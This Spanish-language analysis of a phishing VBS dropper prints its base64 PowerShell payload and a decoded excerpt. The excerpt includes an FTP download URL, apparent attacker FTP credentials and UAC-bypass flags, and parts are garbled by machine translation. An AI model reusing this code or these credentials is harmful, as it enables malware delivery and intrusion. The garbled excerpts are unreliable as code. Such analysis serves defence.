Por Laura Cardillo y Átila Altoé: Este es un análisis de un archivo transformado a lenguaje VBS, siendo este un archivo phishing recibido por correo electrónico desde una cuenta de terceros. El objetivo de este informe no es explicar en detalle cómo funciona el malware en sí, sino presentar una forma de identificar y descifrar la carga útil que lo disemina.

En este informe, demostraremos cómo se realizó el análisis utilizando VBS para identificar y descifrar el código malicioso y la ejecución de este malware.

Vea la acción del malware

La muestra extraída en cuestión se indica a continuación:

Para comenzar el análisis, inspeccionamos el archivo a través de Notepad++ y observamos la presencia de un comando Powershell para decodificar cadenasen base64. Por desgracia, el contenido de destino de este acceso directo es demasiado largo para la ventana de propiedades del archivo. A continuación se muestra la cadena obtenida:

“b24gZXJyb3IgcmVzdW1lIG5leHQNCkRpbSB3aW5zaGVsbA0KU2V0IHdpbnNoZWxsID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKQ0KVGltYmFsYXRlID0gInNldHVwLnppcCINClRpbWJhbGF0ZXMgPSAic2V0eC5leGUiDQpVUkwgPSAiZnRwOi8vZnRwLmVzdGFtb3NhaW5hbmEuY29tL3d3dy9pbWFnZW5zLnppcCINClBBQ09URVVTRVIgPSAiZXN0YW1vc2FpbmFuYSINClhBTlBVU0VSID0gInBRTlBlNnZeOTFUWCINCkRpbSBCYWdhbmVGb2xkDQpCYWdhbmVGb2xkID0gd2luc2hlbGwuZXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzKCIlQWxsVXNlcnNQcm9maWxlJSIpDQpEZXN0Rm9sZGVyID0gQmFnYW5lRm9sZCAmICJcU2V0WCINCkRpbSBvYmpXTUlTZXJ2aWNlLCBwcm9jZXNzSXRlbXMsIHByb2Nlc3NOYW1lDQpwcm9jZXNzTmFtZSA9ICJ3c2NyaXB0LmV4ZSINCkRpbSBqb3JkaQ0Kam9yZGkgPSBXU2NyaXB0LlNjcmlwdEZ1bGxOYW1lDQpGT1JDRSA9ICJTSU0iDQpVQUNCWVBBU1MgPSAiTkFPIg0KU2V0IHhtbCA9IENyZWF0ZU9iamVjdChTdHJSZXZlcnNlKCJ0Zm9zb3JjaU0iKSYgIi4iICYgU3RyUmV2ZXJzZSgiUFRUSExNWCIpKQ0Kc2V0IGphcmRpbVhYWFhYWCA9IENyZWF0ZU9iamVjdChQcm9mZXNzb3JhKCJjMCtcNCIsIk4wWCIpICYgIi4iICYgU3RyUmV2ZXJzZSgibm9pdGFjaWxwcEEiKSkNCkNvbnN0IGFkVHlwZUJpbmFyeSA9IDENCkNvbnN0IGFkU2F2ZUNyZWF0ZU92ZXJXcml0ZSA9IDINCkNvbnN0IGFkU2F2ZUNyZ

Como es humanamente imposible entender este tipo de cadena, para descifrarla utilizamos la ayuda de la herramienta cyberchef, con la que encontramos la siguiente función:

en caso de error reanudar siguiente

Dim winshell

Set winshell = WScript.CreateObject("WScript.Shell")

Timbalate = "setup.zip".

Timbalates = "setx.exe"

URL = "ftp://ftp.estamosainana.com/www/imagens.zip"

PACOTEUSER = "nosotros areainana"

XANPUSER = "pQNPe6v^91TX"

Dim BaganeFold

BaganeFold = winshell.expandEnvironmentStrings("%PerfilTodosUsuarios%")

DestFolder = BaganeFolder & "\SetX".

Dim objWMIService, processItems, processName

processName = "wscript.exe"

Dim jordi

jordi = WScript.ScriptNombreCompleto

FORCE = "YES".

UACBYPASS = "NO".

Desde el inicio de la función, se pueden observar algunos puntos de atención como URL, usuario y contraseña referentes a la cuenta que realiza el ataque, o incluso que el atacante utiliza un servidor FTP para difundir los archivos maliciosos, así como el nombre de los archivos que se utilizarán en la infección:

Al seguir discutiendo el papel, también se descubrió que se intentó crear un usuario ("Fisga"). Esto pasó por un proceso de Revertirelevando así sus privilegios y convirtiéndolo en "root".

Por último, también se observa que el malware utiliza una expresión específica al final de la función para realizar la táctica de Persistencia (MITRE ATT&CK) y obliga al usuario a aceptar "root"que se indica a continuación:

Si no

girar

exec

Fin If

ElseIf UACBYPASS = "YES" Then

girar

execc

Si no

girar

exec

Fin If

Fin de la función

Recomendaciones

El primer consejo importante que debe tener en cuenta es que la mayoría de las empresas de confianza no solicitan información personal ni datos de cuentas por correo electrónico. Esto incluye su banco, compañías de seguros y cualquier empresa con la que haga negocios. Si recibes un correo electrónico en el que te piden cualquier tipo de información sobre tu cuenta, elimínalo inmediatamente y llama a la empresa para confirmar que tu cuenta es segura.

• No abra los archivos adjuntos de estos correos electrónicos sospechosos o extraños, especialmente los archivos adjuntos de Word, Excel, PowerPoint o PDF.
• Un consejo útil para prevenir el phishing es evitar siempre hacer clic en enlaces incrustados en correos electrónicos, ya que pueden estar cargados de malware.
• Otra forma de reducir la exposición a los mensajes de phishing es utilizar programas antivirus y antispam.

Por último, es fundamental utilizar un gestor de contraseñas para gestionar las credenciales. Es recomendable disponer de un gestor de contraseñas, ya que los atacantes malintencionados intentarán utilizar las credenciales descubiertas en toda la Web. Una de las mejores características de los gestores de contraseñas es el autorellenado de formularios de inicio de sesión para minimizar los clics.

Referencias

1. Archivo recibido a través de honeypot y uso de herramientas Open source.
2. https://www.kaspersky.com.br/resource-center/preemptive-safety/phishing-prevention-tips